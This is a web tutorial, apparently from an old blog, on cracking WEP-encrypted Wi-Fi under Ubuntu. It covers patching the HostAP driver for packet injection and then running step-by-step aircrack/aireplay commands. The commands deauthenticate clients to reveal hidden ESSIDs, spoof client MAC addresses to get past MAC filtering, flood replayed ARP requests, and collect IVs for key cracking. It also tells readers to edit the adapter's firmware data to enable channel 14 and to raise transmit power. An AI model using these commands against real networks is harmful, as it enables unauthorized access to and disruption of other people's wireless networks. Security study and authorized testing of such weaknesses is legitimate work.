Operating system in the tutorial: Ubuntu 6.06 LTS Dapper Drake (works also with Ubuntu 6.10, 7.04, 7.10, 8.04, 9.04, 10.04 – see link for patching hostap in newer Ubuntu distro), Hardware you meet in the tutorial: WiFi adapters Z-Com XI-626 (Prism 2.5), CM9 (Atheros), Application: Aircrack Pack, Kismet, tcpdump, Driver: HostAP + packet injection patch tutorial. Question and discussion is moved to the other things in the Forum Ubuntu Security thread.
Ubuntu repositories contains everithing needed including hostap source but we use the last version of hostap 0.4.9 and 0.4.7 packet injection patch.
Ubuntu installed from DVD uses kernel by proccesor type (in case AMD it uses kernerl k7, in Intel case it uses kernel i386).
Packet injection patch doesn’t work under k7 kernel! correctly or at all.
So we need to install kernel headers and i386 kernel image and boot it up.
Z-com XI-626 adapter (generali in linux) runs under Orinoco module. Modrpobe how to..
Get out that module like root do it:
modprobe -r orinoco_pci
blacklist orinoco_pci into /etc/modprobe.d/blacklist
After reboot download the driver and use the patch.
tar -xvzf hostap-driver-0.4.9.tar.gz
patch -Np1 -i hostap-driver-0.4.7.patch
Next ..in the path /home/user/hostap-driver-0.4.9/driver/modules/ search for files:
In one of each file find these five rows and remove them.
(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14))
Host AP driver was added into Linux 2.6.14.
The version used in the kernel tree should be used instead of this
external release which is only maintained for old kernel versions.
Let compilation begins.. run make
After.., don’t use “make install”. First yuo should store original contents then clean up /hostap folder and copy all *.ko files from /hostap-driver-0.4.9/driver/modules/ into /lib/modules/2.6…..-386/kernel/drivers/net/wireless/hostap/
Next .. Find and copy hostap_en.conf from /hostap-driver-0.4.9/driver/etc/ into /etc/pcmcia/
Reboot. After reboot run these commands:
ifconfig wlan0 down
ifconfig wlan0 up
Check with commnad dmesg | grep hostap
Z-Com with firmware newer than 1.7.4 is in the system registred as ethX. This version of firmware is recommended. Otherwise try to flash you adapter. Check your version of firmware with
hostap_diag -p wlan0
‘ll see something like that: Host AP driver diagnostics information for ‘wlan0’
id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
id=0x001f v1.7.4 (station firmware)
Channel no. 14
To get running 14. channel on Z-Com adapter we need edit PDA (Production Data Area). Don’t change localization. Just change
1fff to 3fff on line 0x0104.
Packet injection is nothing more than time reduction. Cracking of WEP is possible without packet injection but it can take tens of hours or few days. Aircrack pack contains these parts: aircrack, airodump, airmon, aireplay, airdecap
Aircrack-ng pack contains these parts: aircrack-ng, airodump-ng, airmon-ng, aireplay-ng, packetforge-ng, airtun-ng, airserv-ng. We uses packet injection in Aireplay. Before we start to laborate we should check if packet injection works.
Option 1: Switch adapter to monitor mode. Command iwconfig contains wireless tools, airmon pack aircrack.
iwconfig wlan0 mode monitor or airmon start wlan0 for aircrack-ng command airmon-ng start wlan0
Now run Ethereal or Wireshark with realtime traffic showing on wlan0 adapter. For showing only deauth packets use filter
In next step run in shell command
aireplay -0 5 -a 01:02:03:04:05:06 wlan0
(command for newer version aircrack-ng is aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0
In Ethereal window you see five deauth packets with MAC address 01:02:03:04:05:06
Option II -> Test with AP with hidden ESSID. When client deauth doesn’t work on encrypted network even if you know its MAC you have bad luck.
Monitor mode, detection
About WEP (Wired Equivalent Privacy) weaknesses was written hundreds pages of text and new theories like Chopchop are comming out. So if you want to know more about it go and search.
Switch adapter to monitor mode
airmon start wlan0
(command for aircrack-ng airmon-ng start wlan0 )
Run Airdodump that until stopped (ctr+c) scans available networks. “3”
is number of channel. “out” is log file. “1” after the number channel means that only WEP packets will be logged. (Name of the log file and channel number is optional)
airodump wlan0 out 3 1
command for aircrack-ng is airodump-ng –ivs -w out –ch 3 wlan0
for Aircrack-ng with particular MAC in case that quantum of APs are around..
airodump-ng –bssid 00:60:Bx:xx:xx:xx –ivs -w out –ch 3 wlan0
Aircrack comment: Without ininitation of file format “1” (means “ivs”) is possible to store into pcap. First we notice is strength of signal. Too big or small distance is problem. In first case (saturation) there is no must to have the signal even if you have AP next on your desk. Viewed PWR are authentic. Value lower than 163 means no-hope.
Optimal PWR value is between 167 and 195. Locating the best direction by the move of the antenna and watching PWR coast minimum of time. Finding out the polarization is metter of rotating antenna 90°. To gain transfer use power regulation (standard on Z-Com is 198):
iwpriv wlan0 writemif 62 130
This leads to less packet loss:
wconfig wlan0 rate 1M
iwconfig wlan0 sens 3 [1, 2, 3]
Deauth, Packet injection, Hidden essid
Detected AP have a good singnal with connected clients and doesn’t provide ESSID.
Use Aireplay -0. Number 5 means count of deauth packets that we send, “-0” is the first of five mods in Aireplay.
Deauth to broadcast
aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0
Deauth client with MAC.
aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Deauth to broadcast with MAC of source
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx wlan0
Deauth to client with MAC of source
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
cmd for Aireplay-ng:
aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Deauth “disconnect” the client connected to AP and Airodump in the first shell records reconnect of that client containing ESSID. Now we have name of the AP.
To begin the communication with AP it is necessary at first to nock on the door :-) that means to associate. In case that on the AP is the MAC restriction set up it is necessary to know at least one valid MAC address. Exactly for this serves the projection of connected clients. When Airodump does not detect any clients it means: bad signal, bad timing :-), ad-hoc network, or it is a data AP. On this data AP nobody usualy connects and it serves only as a data line (used for example by UPC), repeater (bridge)
aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0
aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx ath0
In case of a sufficient signal, knowledge of essid [AP name] and allowed (in the case of mac restriction) MAC address the association works on 99%.
ARP, trafic generation
After the association run the packet injection by the Aireplay -3 [ARP-request reply] Replayig multiples the traffic, number of WEP packets, even the number of initializing vectors :-)
aireplay -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
aireplay-ng -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
-x 600 stands for number of packets in a second. Number of ARP request -u stops on number 1024.
In the first panel see the progress.
The time in which Airodump gathers enough of packets [for 64bit code 80 to 300 000, for128bit coding 300 000 to 1 000 000 packets] depends on the speed of the line – quality of the signal as mentioned above. Duration of packet gathering is 10 minutes to one hour. [+ , -] Ideal is to associate on the same mac address as the client who himself generates traffic [for example downloading on p2p ].
In this case after packet injection start up 300 000 ivs happends in few minutes. Aireplay as well as Airodump and Aircrack can be stoped and restarted without influencing the result.
Second Part of the Wireless Penetration Testing continue at text Korek, Kismet and Gateway
- HostAP Ubuntu 7.04 Packet Injection
- Packet Injection wifi Intel 4965 AGN patch
- The Wireless Adapters and Applications
- Linux live CD for geeks – WiFiSlax 3.0
- Aireplay-ng Packet Injection Windows CommView Hack
- KoreK chopchop, Kismet, Gateway Ubuntu
- Airgraph-ng graphing away Wi-Fi traffic
- Aircrack 1.0 BETA .lzm BackTrack
- WEP cracking Intel Centrino, OmniPeek + winAircrack
- Intel Centrino Packet Injection WiFiSlax and ipw3945